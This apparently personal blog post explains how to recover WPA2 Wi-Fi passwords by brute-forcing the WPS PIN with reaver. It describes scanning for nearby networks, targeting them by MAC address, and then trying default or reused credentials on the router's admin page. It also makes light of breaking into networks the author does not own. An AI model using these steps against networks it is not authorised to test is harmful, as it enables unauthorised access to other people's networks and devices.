These instructions are IDENTICAL for both BackTrack 5 R3 & Kali 1!
Side-note, this does not work with all routers using WPA2, depends on cypher.
I’ll show how to get around these in a later post.
First start your WiFi NIC.
Then configure it for “monitoring / scanning” mode.
You’ll see similar to this screenshot. I let it scan for 10 minutes. Where you see “<length: 8>” is where a hidden WiFi network SSID is, a little more time will reveal the SSID. I dropped the font size down so I could get the console window to fit the SSID’s so you could see the full names. After letting the scan run for awhile hit CTRL + C to drop back to command line then highlight the MAC Address of the network you want to crack and copy it. As far as I’m concerned anyone who sets their SSID as “yesitssecure” is asking to be proved otherwise.
Type in the “reaver” command and options and paste the MAC Address followed by -vv (for enhanced verbose mode) then enter. You’ll see it start by scanning the channels, once it locks onto the SSID it will start brute-force attack immediately. This typically takes 9-10 hours.
Here’s what you can expect to see shortly after initializing reaver. Progress in % & stats showing an estimate of seconds per pin.
Here you can see it completed in roughly 9 1/2 hours from the time I started the scan. Shows you a little more statistics info plus some real useful info such as the password to connect to the WiFi (the whole reason we’re doing this to begin with right?). The password is the PSK value if you hadn’t figured that out. The WPS PIN is the number on the bottom of the WiFi router used to connect to it easily for the first time which you’re suppose to enter a password that will be used from then on after.
According to the homework I’ve done these routers are easily cracked by this method and WPS should be disabled to avoid this security vulnerability, I’ve also read that disabling this feature doesn’t really disable it and makes it impossible to prevent cracking the device using this method. I have DD-WRT on my own WiFi so hopefully those guys actually have it disabled rather than providing the false sense of security as the manufactures do by just showing a radio button that visually shows the feature is disabled when really it isn’t.
One last thing to note. From my experience the WiFi router management browser interface is usually either still left as the original default login info set by the manufacture or all they changed was the password to the same one they set the WiFi connection password to which we just cracked. If it’s neither there’s a tool in BackTrack that will crack the web interface but I have yet to need to. At some point I do want to try it out there and of course if I can successfully get it to work I’ll do a post about it. I hope you enjoyed this and found it educational.
There’s a “WEP Cracking with BackTrack 5 R3” post I did back in October last year if you are interested in how to crack WiFi routers utilizing that authentication method. These can be cracked in half the time of the WPA2.
I’ve been meaning to do this post since I did the WEP post. I needed to whittle down the best way to do it because everything I found online as far as blogs and videos on YouTube go, the methods didn’t actually work for whatever reason. I have found through tiral and error on my own these were far many more steps involved and the process was much more complicated using other peoples methods to achieve the same results I have with at least half of the keystrokes & effort.